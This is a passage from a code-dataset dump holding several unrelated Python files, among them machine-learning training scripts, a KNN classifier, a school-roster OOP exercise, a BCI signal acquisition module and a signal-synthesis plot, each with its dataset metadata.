%H:%M:%S')\r\n cpu_jobs = os.cpu_count() - 1\r\n date_null = pd.to_datetime('1970-01-01', format='%Y-%m-%d')\r\n\r\n dataset12, dataset3 = get_processed_data()\r\n # analysis()\r\n # detect_duplicate_columns()\r\n # feature_importance_score()\r\n\r\n # grid_search_gbdt()\r\n # train_gbdt()\r\n # predict('gbdt')\r\n\r\n # grid_search_xgb()\r\n train_xgb(dataset12, dataset3)\r\n\r\n # print('predict: start predicting......')\r\n # # predict('xgb')\r\n # print('predict: predicting finished.')\r\n\r\n # log += 'time: %s\\n' % str((datetime.datetime.now() - start)).split('.')[0]\r\n # log += '----------------------------------------------------\\n'\r\n # open('%s.log' % os.path.basename(__file__), 'a').write(log)\r\n # print(log)\r\n print(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\r\n print('time costed is: %s s' % (datetime.datetime.now() - start).seconds)","sub_path":"Anaylsis/xgb_predict.py","file_name":"xgb_predict.py","file_ext":"py","file_size_in_byte":5277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"474173555","text":"import dataExtractor as de\nimport torch\n\na = de.DataAdjust('data/test_data.csv',drop=False)\n\ntest = de.TrajDataSet(a.get_data_Frame(),mem_nb=3)\ntest_loader = torch.utils.data.DataLoader(test,batch_size=1,shuffle=False)\n#state = next(iter(test_loader))\n#exemple = test[0]\n#print(f'\\n---------------\\n Voici notre état \\n {state} \\n ---------------')\n#print(f'Voici ce que nous renvoie le 10 élément de test \\n {exemple} \\n ---------------')\n#print(f'Le contenu de test avant le passage à torch : \\n {test.get_traj()[0:3]} \\n ---------------')\n#print(f'La shape de notre Tenseur renvoyé par le test_loader : state {state[0].shape} et action {state[1].shape}')\n\n############# Test du Réseau de neurones \nprint('Avant les test.')\ncouche = torch.nn.Linear(2, 2)\n\n(state,action) = next(iter(test_loader))\naction = couche.forward(state.float())\n\noutput = couche(state.float())\nprint(state.numpy()[0][0])\nprint('Test réussi')\n","sub_path":"Network_with_memory/buufer_tester.py","file_name":"buufer_tester.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"210510702","text":"\"\"\"\n=================================================================================================================\nЗадание-37:\nРеализуйте описаную ниже задачу, используя парадигмы ООП:\nВ школе есть Классы(5А, 7Б и т.д.), в которых учатся Ученики. У каждого ученика есть два Родителя(мама и папа).\nТакже в школе преподают Учителя, один учитель может преподавать в неограниченном кол-ве классов\nсвой определенный предмет. Т.е. Учитель Иванов может преподавать математику у 5А и 6Б, но больше математику не\nможет преподавать никто другой.\n\nВыбранная и заполненная данными структура должна решать следующие задачи:\n1. Получить полный список всех классов школы (DONE+)\n2. Получить список всех учеников в указанном классе (каждый ученик отображается в формате \"Фамилия И.О.\") (DONE+)\n3. Получить список всех предметов указанного ученика (Ученик --> Класс --> Учителя --> Предметы) (DONE)\n4. Узнать ФИО родителей указанного ученика (DONE+)\n5. 
Получить список всех Учителей, преподающих в указанном классе (DONE+)\n=================================================================================================================\n\"\"\"\n\n\nclass Common:\n def __init__(self, name, surname, birth_date, school):\n self.name = name\n self.surname = surname\n self.birth_date = birth_date\n self.school = school\n\n def get_full_name(self):\n return \"Полное имя: {}\".format(self.name + ' ' + self.surname)\n\n\nclass Student(Common):\n def __init__(self, name, surname, birth_date, school, class_room, father, mother):\n Common.__init__(self, name, surname, birth_date, school)\n self._class_room = {'class_num': int(class_room.split()[0]),\n 'class_char': class_room.split()[1]}\n self.father = father\n self.mother = mother\n\n @property\n def get_short_name(self):\n return self.surname + ' ' + self.name[0] + '.' + self.father[0] + '.'\n\n @property\n def parents(self):\n parents_names = str(self.father) + ' и ' + str(self.mother)\n return \"Родители ученика '{}': {}\".format(self.get_short_name, parents_names)\n\n @property\n def class_room(self):\n return \"{} {}\".format(self._class_room['class_num'], \\\n self._class_room['class_char'])\n\n def list_of_classes(self, students):\n list_of_classes = []\n for Student in students:\n if Student.class_room not in list_of_classes:\n list_of_classes.append(Student.class_room)\n print(\"Список всех классов школы: {}\".format(list_of_classes))\n\n def classmates(self, students):\n list_of_classes = []\n for Student in students:\n if Student.class_room not in list_of_classes:\n list_of_classes.append(Student.class_room)\n\n for i in list_of_classes:\n classmates = []\n for Student in students:\n if i == Student.class_room:\n classmates.append(Student.get_short_name)\n a = Student.class_room\n print(\"Список учеников класса {}: {}\".format(a, classmates))\n\n\nclass Teacher(Common):\n def __init__(self, name, surname, birth_date, school, teach_classes, discipline):\n Common.__init__(self, name, surname, birth_date, school)\n self.teach_classes = list(teach_classes)\n self.discipline = list(discipline)\n\n def list_of_teachers(self, teachers):\n list_of_classes2 = []\n for Teacher in teachers:\n for i in self.teach_classes:\n if i not in list_of_classes2:\n list_of_classes2.append(i)\n for j in list_of_classes2:\n list_of_teachers = []\n for Teacher in teachers:\n if j in Teacher.teach_classes:\n list_of_teachers.append(Teacher.get_full_name())\n print(\"Список учителей класса {}: {}\".format(j, list_of_teachers))\n\ndef list_of_disciplines(students, teachers):\n for Student in students:\n courses = []\n for Teacher in teachers:\n if Student.class_room in Teacher.teach_classes:\n courses.append(Teacher.discipline)\n print(\"Список предметов уч-ка {}: {}\".format(Student.get_short_name, courses))\n\nstudents = [Student(\"Александр\", \"Иванов\", '10.11.1998', \"Лицей №5\", \"5 А\", \"Семён\", \"Ольга\"),\n Student(\"Анастасия\", \"Соколова\", '10.05.1998', \"Лицей №5\", \"5 А\", \"Василий\", \"Наталья\"),\n Student(\"Алексей\", \"Сидоров\", '12.03.1998', \"Лицей №5\", \"5 Б\", \"Дмитрий\", \"Елена\"),\n Student(\"Василиса\", \"Сидорова\", '07.04.1998', \"Лицей №5\", \"5 Б\", \"Дмитрий\", \"Елена\"),\n Student(\"Матвей\", \"Чижиков\", '11.05.1998', \"Лицей №5\", \"5 В\", \"Константин\", \"Валерия\"),\n Student(\"Дмитрий\", \"Питонов\", '16.06.1998', \"Лицей №5\", \"5 В\", \"Станислав\", \"Екатерина\"),\n Student(\"Алёна\", \"Комиссарова\", '15.04.1996', \"Лицей №5\", \"7 А\", \"Василий\", \"Марина\"),\n 
Student(\"Никита\", \"Фича\", '03.05.1996', \"Лицей №5\", \"7 А\", \"Сергей\", \"Оксана\"),\n Student(\"Анна\", \"Обновлюха\", '11.02.1996', \"Лицей №5\", \"7 Б\", \"Александр\", \"Ксения\"),\n Student(\"Петр\", \"Владимиров\", '17.06.1996', \"Лицей №5\", \"7 Б\", \"Алексей\", \"Анастатия\"),\n Student(\"Мария\", \"Петрова\", '12.07.1996', \"Лицей №5\", \"7 Б\", \"Николай\", \"Маргарита\"),\n ]\n\nteachers = [Teacher(\"Сергей\", \"Михайлов\", '07.10.1978', \"Лицей №5\", [\"7 А\", \"7 Б\"], \\\n [\"Информатика\", \"Физкультура\"]),\n Teacher(\"Леонид\", \"Вассерман\", '10.03.1965', \"Лицей №5\", [\"5 А\", \"5 Б\", \"5 В\", \"7 А\", \"7 Б\"], \\\n [\"Алгебра\", \"Геометрия\", \"Физика\"]),\n Teacher(\"Валентина\", \"Вассерман\", '10.03.1971', \"Лицей №5\", [\"7 А\", \"7 Б\"], [\"Химия\", \"Биология\"]),\n Teacher(\"Екатерина\", \"Васильева\", '10.03.1995', \"Лицей №5\", [\"5 А\", \"5 Б\", \"5 В\", \"7 А\", \"7 Б\"], \\\n [\"Иностранный язык\"]),\n Teacher(\"Анна\", \"Добрая\", '10.03.1965', \"Лицей №5\", [\"7 А\", \"7 Б\"], [\"История\", \"Обществознание\"]),\n Teacher(\"Валентина\", \"Петр��ва\", '11.09.1959', \"Лицей №5\", [\"5 А\", \"5 Б\", \"5 В\", \"7 А\", \"7 Б\"], \\\n [\"Русский язык\", \"Литература\"]),\n ]\n\nprint(\"=========================РОДИТЕЛИ УЧЕНИКА=============================\")\nprint(students[0].parents)\n\nprint(\"==============================КЛАССЫ==================================\")\nlist_of_classes1 = []\nfor Student in students:\n if Student.class_room not in list_of_classes1:\n list_of_classes1.append(Student.class_room)\nprint(\"Список всех классов школы: {}\".format(list_of_classes1))\n\n# ИЛИ:\nprint(Student.list_of_classes(students))\n\nprint(\"==========================УЧИТЕЛЯ КЛАССОВ=============================\")\nfor i in list_of_classes1:\n list_of_teachers = []\n for Teacher in teachers:\n if i in Teacher.teach_classes:\n list_of_teachers.append(Teacher.get_full_name())\n print(\"Список учителей класса {}: {}\".format(i, list_of_teachers))\n\n# ИЛИ:\nprint(\"_______________________________ИЛИ:___________________________________\")\nprint(Teacher.list_of_teachers(teachers))\n\nprint(\"=========================УЧЕНИКИ КЛАССОВ==============================\")\nfor i in list_of_classes1:\n classmates1 = []\n for Student in students:\n if i == Student.class_room:\n classmates1.append(Student.get_short_name)\n print(\"Список учеников класса {}: {}\".format(i, classmates1))\n\n# ИЛИ:\nprint(\"_______________________________ИЛИ:___________________________________\")\nprint(Student.classmates(students))\n\nprint(\"=========================ПРЕДМЕТЫ УЧЕНИКА=============================\")\n\n# Преподаватель обязательно ведёт все свои предметы во всех своих классах\nfor Student in students:\n courses = []\n for Teacher in teachers:\n if Student.class_room in Teacher.teach_classes:\n courses.append(Teacher.discipline)\n print(\"Список предметов уч-ка {}: {}\".format(Student.get_short_name, courses))\n\n# ИЛИ:\nprint(\"_______________________________ИЛИ:___________________________________\")\nprint(list_of_disciplines(students, teachers))\n\nprint(\"=====================СПИСОК ВСЕХ УЧЕНИКОВ ШКОЛЫ=======================\")\nfor num, Student in enumerate(students, start=1):\n print(\"{}) {} {} {}\".format(num, Student.get_short_name, Student.class_room, 
Student.parents))\nprint(\"==============================TEST====================================\")\nprint(students[2].get_full_name())\nprint(students[2].get_short_name)\nprint(students[2].class_room)\nprint(teachers[1].get_full_name())\nprint(teachers[1].teach_classes)\nprint(teachers[1].discipline)\n","sub_path":"Python: level 1 (typical exs.)/Exercise_37.py","file_name":"Exercise_37.py","file_ext":"py","file_size_in_byte":10320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"644421106","text":"from sklearn.utils import shuffle\n\nclass KNeighborsClassifier():\n def __init__(self, n_neighbors=5):\n self.n_neighbors = n_neighbors\n self.X=None\n self.y=None\n self.y_list=None\n self.dimension=1\n\n def fit(self, X, y):\n if not isinstance(X, list) or not isinstance(y, list):\n raise ValueError('Input type has to be list')\n self.X, self.y = shuffle(X, y, random_state=0)\n self.y_list=list(set(y))\n self.dimension = len(self.X[0])\n\n def predict(self, X):\n pred_results = []\n for target_x in X:\n predict=''\n dists=[]\n neighbors=[]\n labels = list(self.y)\n\n for i in range(len(self.X)):\n dist = 0\n for j in range(self.dimension):\n dist += (self.X[i][j] - target_x[j])**2\n dists.append(dist)\n\n for i in range(self.n_neighbors):\n neighbors.append(self.__get_min(dists, labels))\n\n last_min_x = neighbors[self.n_neighbors-1][0]\n while last_min_x == min(dists):\n neighbors.append(self.__get_min(dists, labels))\n\n neighbor_labels = [i[1] for i in neighbors]\n max_cnt=0\n for label in self.y_list:\n cnt = neighbor_labels.count(label)\n if max_cnt < cnt :\n max_cnt = cnt\n predict = label\n\n pred_results.append(predict)\n if len(pred_results)==1 :\n return pred_results[0]\n return pred_results\n\n def __get_min(self, dists, labels):\n min_x = min(dists)\n min_index = dists.index(min_x)\n result = list([min_x, labels[min_index]])\n dists.remove(min_x)\n del labels[min_index]\n return result","sub_path":"Data/knn-classifier/knn_classifier.py","file_name":"knn_classifier.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"471755606","text":"def AsalSayi(sayi):\n if (sayi > 1):\n for i in range(2,sayi):\n if (sayi % i == 0):\n return False\n return True\n\n else:\n return False\n\n\nwhile True:\n if(AsalSayi(int(input(\"Asallığını sorgulamak istediğiniz sayıyı girin: \")))):\n print(\"Sayınız Asal\")\n else:\n print(\"Sayınız asal değil\")\n","sub_path":"AsalSayıSorgulama.py","file_name":"AsalSayıSorgulama.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"187114156","text":"# Copyright (c) James Percent and Unlock contributors.\n# All rights reserved.\n# Redistribution and use in source and binary forms, with or without modification,\n# are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# \n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n#\n# 3. 
Neither the name of Unlock nor the names of its contributors may be used\n# to endorse or promote products derived from this software without\n# specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON\n# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nimport sys\nimport time\n\nimported_neural_signal = False\nno_bci = False\n\ntry:\n #from unlock.bci.acquire.neuralsignal import create_timer\n from unlock.bci.acquire.random_signal import create_timer, create_random_signal\n imported_neural_signal = True\nexcept:\n assert sys.platform == 'darwin' or sys.platform == 'linux'\n no_bci = True\n\ntry:\n from unlock.bci.acquire.mobilab_signal import create_nonblocking_mobilab_signal\nexcept Exception as e:\n print(\"unlock/acquire.__init__.py: mobilab not present\", e)\n\ntry:\n from unlock.bci.acquire.enobio_signal import create_nonblocking_enobio_signal\nexcept:\n print(\"unlock/acquire.__init__.py: enobio not present\")\n\ntry:\n from unlock.bci.acquire.nidaq_signal import create_nidaq_signal\nexcept:\n print(\"unlock/acquire.__init__.py: nidaq not present\")\n\nfrom unlock.bci.acquire.audio_signal import *\nfrom unlock.bci.acquire.file_signal import *\n\nclass NoBciRandomSignal(object):\n def __init__(self,channels=8, seed=42, lower_bound=1, upper_bound=65536):\n super(NoBciRandomSignal, self).__init__()\n import random\n self.chans = channels\n self.rand = random.Random()\n self.rand.seed(seed)\n self.lower_bound = lower_bound\n self.upper_bound = upper_bound\n \n def open(self, macaddr):\n self.mac = macaddr\n return True\n \n def init(self, channels):\n self.chans = channels\n return True\n \n def channels(self):\n return self.chans\n \n def start(self):\n return True\n \n def acquire(self):\n return 1 * self.chans\n \n def getdata(self, samples):\n import numpy as np\n ret = np.array([float(self.rand.randint(self.lower_bound, self.upper_bound)) for i in range(0, samples)])\n ret[-1] = 0\n return ret\n \n def getEaplsedMicros(self):\n pass\n \n def timestamp(self):\n pass\n \n def stop(self):\n pass\n \n def close(self): \n pass\n\nclass BasicTimer(object):\n def __init__(self):\n self.start = time.time()\n\n def elapsedMicroSecs(self):\n return time.time() - self.start\n\n\nclass UnlockAcquisitionFactory:\n def __init__(self):\n if imported_neural_signal:\n self.timer = create_timer()\n else:\n self.timer = BasicTimer()\n\n def create_nidaq_signal(self):\n signal = create_nidaq_signal(self.timer)\n if not signal.start():\n raise RuntimeError('Failed to start National Instruments DAQ')\n return signal\n #for j in range(50):\n # ret = daq.acquire()\n # ret = daq.getdata(ret)\n # f = open('test.data', 'wb')\n # import numpy as np\n # a = np.array(ret, dtype='float64')\n # a = a.reshape((500, 4))\n # #np.savetxt(f, a, fmt='%d', delimiter='\\t')\n # for i in range(20):\n # print(a[i])\n 
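# A short sketch of how a caller would drive the NoBciRandomSignal stub defined
# earlier in this module; the demo function itself is illustrative, not part of
# the original source.
def _demo_no_bci_signal():
    sig = NoBciRandomSignal(channels=4, seed=7)
    sig.open([])            # the stub only records the (empty) MAC address
    sig.start()
    n = sig.acquire()       # one sample per channel -> 4
    block = sig.getdata(n)  # numpy array of 4 random values, last entry zeroed
    sig.stop()
    sig.close()
    return block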
#\n\n    def create_audio_signal(self):\n        signal = AudioSignal()\n        if not signal.start():\n            raise RuntimeError('failed to start audio signal')\n        return signal\n\n    def create_enobio_signal(self, mac_addr):\n        assert 'mac_addr' in self.config['signal']\n        mac_addr = [int(value,0) for value in [x.strip() for x in self.config['signal']['mac_addr'].split(',')]]\n        signal = create_nonblocking_enobio_signal(self.timer)\n        if not signal.open(mac_addr):\n            print('enobio did not open')\n            raise RuntimeError('enobio did not open')\n        if not signal.start():\n            print('enobio device did not start streaming')\n            raise RuntimeError('enobio device did not start streaming')\n        return signal\n\n    def create_mobilab_signal(self, com_port, analog_channels_bitmask):\n        from unlock.bci import acquire\n        signal = create_nonblocking_mobilab_signal(\n            self.timer, analog_channels_bitmask, 0, com_port)\n\n        if not signal.start():\n            print('mobilab device did not start streaming')\n            raise RuntimeError('mobilab device did not start streaming')\n        return signal\n\n    def create_file_signal(self, timer):\n        from unlock.bci import acquire\n        timer = acquire.create_timer()\n        raise Exception(\"FIX ME\")\n        signal = acquire.MemoryResidentFileSignal(self.config['bci']['signal']['file'], timer, channels=17) #analysis/data/valid/emg_signal_1380649383_tongue_c.5_r.5_i1.txt',\n\n        if not signal.start():\n            print('file signal failed to start; filename = ', self.config['filename'])\n            raise RuntimeError('file signal failed to start')\n        return signal\n\n    def create_random_signal(self):\n        if no_bci:\n            signal = NoBciRandomSignal()\n        else:\n            from unlock.bci import acquire\n            signal = create_random_signal(self.timer)\n        signal.open([])\n        signal.start()\n        return signal\n\n","sub_path":"unlock/bci/acquire/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"649218453","text":"\nimport math\n\nINFLECTION = 800\n\nMAX_WIDTH = 1300\nMAX_HEIGHT = 2500\n\nMAX_DIST = math.sqrt(\n    ((MAX_WIDTH)**2) + ((MAX_HEIGHT)**2)\n)\n\n\ndef _are_opposite_ends_of_page(y1, y2, page_height):\n    if y1 < 450 and page_height - y2 < 450:\n        return True\n    if y2 < 450 and page_height - y1 < 450:\n        return True\n    return False\n\n\ndef adjusted_euclidean_distance(ld1, ld2, context):\n\n    x1, y1 = ld1['rect']['x'], ld1['rect']['y']\n    x2, y2 = ld2['rect']['x'], ld2['rect']['y']\n\n    # euc_dist_orig = math.sqrt(\n    #     ((x2-x1)**2) + ((y2-y1)**2)\n    # )\n    page_height = context['page_height']\n\n    scaled_height_diff = height_diff = abs(y2-y1)\n    if scaled_height_diff > INFLECTION:\n        scaled_height_diff = INFLECTION + ((scaled_height_diff-INFLECTION) / 2)\n    scaled_height_diff = min(MAX_HEIGHT, scaled_height_diff)\n\n    width_diff = min(MAX_WIDTH, abs(x2-x1))  # cap width and height at 1300 and 2500\n\n    euc_dist_scaled = math.sqrt(\n        (width_diff**2) + (scaled_height_diff**2)\n    )\n\n    if euc_dist_scaled < 170:\n        # too close\n        return 0.5\n\n    # scale to between 0 and 1\n    euc_dist_scaled = min(MAX_DIST, euc_dist_scaled) / MAX_DIST\n\n    if page_height > 1400 and _are_opposite_ends_of_page(y1, y2, page_height):\n        euc_dist_scaled *= 1.2\n        euc_dist_scaled = min(1, euc_dist_scaled)\n    elif height_diff < 1400 and (abs(x2-x1) < 5 or abs(y2-y1) < 5):\n        # if horizontally or vertically aligned\n        euc_dist_scaled *= 0.7\n\n    return euc_dist_scaled\n\n\ndef standard_euclidean_distance(ld1, ld2, context):\n\n    x1, y1 = ld1['rect']['x'], ld1['rect']['y']\n    x2, y2 = ld2['rect']['x'], ld2['rect']['y']\n\n    
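    # Worked example for adjusted_euclidean_distance above (values illustrative):
    # ld1 = {'rect': {'x': 100, 'y': 100}}, ld2 = {'rect': {'x': 100, 'y': 260}},
    # context = {'page_height': 1000} gives a capped distance of
    # sqrt(0**2 + 160**2) = 160, under the "too close" threshold of 170, so the
    # function returns 0.5; larger separations scale into (0, 1] via MAX_DIST.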
width_diff = min(MAX_WIDTH, abs(x2-x1)) # cap height and width at 2500 and 1300\n height_diff = min(MAX_HEIGHT, abs(y2-y1))\n\n dist = math.sqrt(\n (width_diff**2) + (height_diff**2)\n )\n\n return dist / MAX_DIST\n","sub_path":"visual_webscraper/clustering/comparisons/euclidean_distance.py","file_name":"euclidean_distance.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"222151393","text":"import pandas as pd\nimport numpy as np\nimport math\nimport pickle\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import metrics\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn.model_selection import KFold\n\nimport platform\nfrom os import listdir\nfrom os.path import isfile, join\nfrom glob import glob\nfrom pathlib import Path\nimport sys\nimport os\nimport copy\nimport traceback\nimport timeit\nimport random\n\n\nimport matplotlib.pyplot as plt\n\nimport birch\nfrom predictor_advance_v1 import *\nimport utils\n\n\nfrom multiprocessing import Pool, cpu_count\nfrom threading import Thread\nfrom multiprocessing import Queue\n\n# import metrices\n\nimport sys\nimport traceback\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nclass ThreadWithReturnValue(Thread):\n def __init__(self, group=None, target=None, name=None,\n args=(), kwargs={}, Verbose=None):\n Thread.__init__(self, group, target, name, args, kwargs)\n self._return = None\n def run(self):\n #print(type(self._target))\n if self._target is not None:\n self._return = self._target(*self._args,\n **self._kwargs)\n def join(self, *args):\n Thread.join(self, *args)\n return self._return\n\n\n\nclass Bellwether(object):\n\n def __init__(self,data_path,attr_df, goal, month):\n self.directory = data_path\n self.attr_df = attr_df\n self.cores = cpu_count()\n self.goal = goal\n self.metrics = 0\n self.month = month\n\n \n def prepare_data(self, repo_name):\n df_raw = pd.read_csv(self.directory + repo_name, sep=',')\n df_raw = df_raw.drop(columns=['dates']) \n last_col = utils.get_goal(self.goal)\n cols = list(df_raw.columns.values)\n cols.remove(last_col)\n df_adjust = df_raw[cols+[last_col]]\n return df_adjust\n\n\n # Cluster Driver\n def cluster_driver(self,df,print_tree = True):\n X = df.apply(pd.to_numeric)\n cluster = birch.birch(branching_factor=20)\n cluster.fit(X)\n cluster_tree,max_depth = cluster.get_cluster_tree()\n if print_tree:\n cluster.show_clutser_tree()\n return cluster,cluster_tree,max_depth\n\n def build_BIRCH(self):\n goal_name = utils.get_goal(self.goal)\n # self.attr_df = self.attr_df.drop(goal_name, axis = 1)\n # print(goal_name,self.attr_df.columns)\n cluster,cluster_tree,_ = self.cluster_driver(self.attr_df)\n return cluster,cluster_tree\n\n \n def bellwether(self,selected_projects,all_projects):\n final_score = {}\n final_model = {}\n count = 0\n for s_project in selected_projects:\n try:\n data = self.prepare_data(s_project)\n print(s_project)\n list_temp, model_touse = DECART_bellwether(data, self.metrics, \n self.month, all_projects, s_project, \n self.directory, self.goal)\n final_score[s_project] = list_temp\n final_model[s_project] = model_touse\n except ArithmeticError as e:\n print(e)\n continue\n return [final_score, 
final_model]\n\n def run_bellwether(self,projects):\n threads = []\n results = {}\n models = {}\n _projects = projects\n split_projects = np.array_split(_projects, self.cores)\n for i in range(self.cores):\n print(\"starting thread \",i)\n t = ThreadWithReturnValue(target = self.bellwether, args = [split_projects[i],projects])\n threads.append(t)\n for th in threads:\n th.start()\n for th in threads:\n response = th.join()\n results.update(response[0])\n models.update(response[1])\n return results,models\n\n def run(self,selected_projects,cluster_id,data_store_path):\n print(cluster_id)\n final_score, models = self.run_bellwether(selected_projects)\n data_path = Path(data_store_path + utils.get_goal(self.goal) + '/' + str(cluster_id))\n if not data_path.is_dir():\n os.makedirs(data_path)\n with open(data_store_path + utils.get_goal(self.goal) + '/' + str(cluster_id) + '/goal_' + str(self.goal) + '.pkl', 'wb') as handle:\n pickle.dump(final_score, handle, protocol=pickle.HIGHEST_PROTOCOL)\n \n with open(data_store_path + utils.get_goal(self.goal) + '/' + str(cluster_id) + '/goal_' + str(self.goal) + '_models.pkl', 'wb') as handle:\n pickle.dump(models, handle, protocol=pickle.HIGHEST_PROTOCOL)\n # df = pd.read_pickle(data_store_path + str(cluster_id) + '/700_RF_default_bellwether.pkl')\n\n\nif __name__ == \"__main__\":\n month = 6\n cores = cpu_count()\n for i in range(7):\n print('Running Goal:', i)\n goal = utils.get_goal(i)\n start = timeit.default_timer()\n path = 'data/data_use/'\n meta_path = 'results/month_' + str(month) + '_models/' + goal + '/train_data.pkl'\n data_store_path = 'results/month_' + str(month) + '_models/'\n attr_df = pd.read_pickle(meta_path)\n project_list = list(attr_df.index)\n project_list = project_list\n\n threads = []\n results = {}\n models = {}\n split_projects = np.array_split(project_list, cores)\n\n bell = Bellwether(path,attr_df,i,month)\n for i in range(cores):\n print(\"starting thread \",i)\n t = ThreadWithReturnValue(target = bell.bellwether, args = [split_projects[i],project_list])\n threads.append(t)\n for th in threads:\n th.start()\n for th in threads:\n response = th.join()\n results.update(response[0])\n models.update(response[1])\n \n print(results)\n\n with open(data_store_path + goal + '/default_bellwether.pkl', 'wb') as handle:\n pickle.dump(results, handle, protocol=pickle.HIGHEST_PROTOCOL)\n \n with open(data_store_path + goal + '/default_bellwether_models.pkl', 'wb') as handle:\n pickle.dump(models, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n\n\n\n\n\n","sub_path":"Project_Health/src/default_bellwether.py","file_name":"default_bellwether.py","file_ext":"py","file_size_in_byte":6482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"417731917","text":"import pylab as pl\n\nsr = 44100.\nf1 = 3000\nf2 = 200.\nN = 10\n\nt = pl.arange(0,sr)\nw = 2*pl.pi*f1*t/sr\no = 2*pl.pi*f2*t/sr\na = 0.5\n\nsinw = pl.sin(w)\ncosmo = pl.cos((N+1)*o)\ncosno = pl.cos(N*o)\nden = 1.- 2*a*pl.cos(o) + a*a\nscal = pl.sqrt(1. 
- a*a/ (1+a*a*-2*a**(2*N+2)))\ns = sinw*(1 - a*a - (2*a**(N+1))*(cosmo - a*cosno))/den\ns *= scal \n \npl.figure(figsize=(8,5))\n\npl.subplot(211) \npl.plot(t[0:440]/sr,s[0:440]/max(abs(s)), 'k-')\npl.xlabel(\"time (s)\")\n\nsig = s\nN = 32768\nstart = 0\nx = pl.arange(0,N/2)\nbins = x*sr/N\nwin = pl.hanning(N)\nscal = N*pl.sqrt(pl.mean(win**2))\nsig1 = sig[start:N+start]\nwindow = pl.fft(sig1*win/max(sig1))\nmags = abs(window/scal)\nspec = 20*pl.log10(mags/max(mags))\n\npl.subplot(212) \npl.plot(bins,spec[0:N/2], 'k-')\npl.ylim(-60, 1)\npl.ylabel(\"amp (dB)\", size=16)\npl.xlabel(\"freq (Hz)\", size=16)\npl.yticks()\npl.xticks()\npl.xlim(0,sr/2)\n\npl.tight_layout()\npl.show()\n\n","sub_path":"chapter4/blsum2.py","file_name":"blsum2.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"393283113","text":"import numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Conv2D, MaxPooling2D, Flatten, Dropout\nfrom tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint\nfrom tensorflow.keras.models import load_model\n\n#저장한 데이터 불러오기\nx=np.load('./data/keras64_x.npy')\ny=np.load('./data/keras64_y.npy')\nprint(x.shape) #(1736, 200, 200, 3)\nprint(y.shape) #(1736,)\n\n\n#1. 전처리\n#train-test split\nx_train, x_test, y_train, y_test = train_test_split(x, y, train_size=0.8, random_state=77)\nx_train ,x_val, y_train, y_val = train_test_split(x_train, y_train, train_size=0.7, random_state=77)\n\n#scaling은 ImageDataGenerator 사용할 때 이미 해줌\n\n#predict 만들기 - train-test 에서 shuffle 하고 나서 해줌\nx_pred = x_test[:20]\ny_pred = y_test[:20]\n\n\n#2. 모델링\nmodel = Sequential()\nmodel.add(Conv2D(128, (3,3), padding=\"same\", input_shape=(200,200,3), activation='relu'))\nmodel.add(MaxPooling2D(pool_size=4))\nmodel.add(Dropout(0.3))\nmodel.add(Conv2D(128, (3,3), padding=\"same\", activation='relu'))\nmodel.add(MaxPooling2D(pool_size=3))\nmodel.add(Dropout(0.3))\nmodel.add(Conv2D(64, (3,2), padding=\"same\", activation='relu'))\nmodel.add(MaxPooling2D(pool_size=2))\nmodel.add(Dropout(0.3))\nmodel.add(Conv2D(64, (3,2), padding=\"same\", activation='relu'))\nmodel.add(MaxPooling2D(pool_size=3))\nmodel.add(Dropout(0.3))\nmodel.add(Flatten())\nmodel.add(Dense(256, activation='relu'))\nmodel.add(Dropout(0.3))\nmodel.add(Dense(128, activation='relu'))\nmodel.add(Dense(63, activation='relu'))\nmodel.add(Dense(1, activation='sigmoid'))\n\n\n#3. 컴파일, 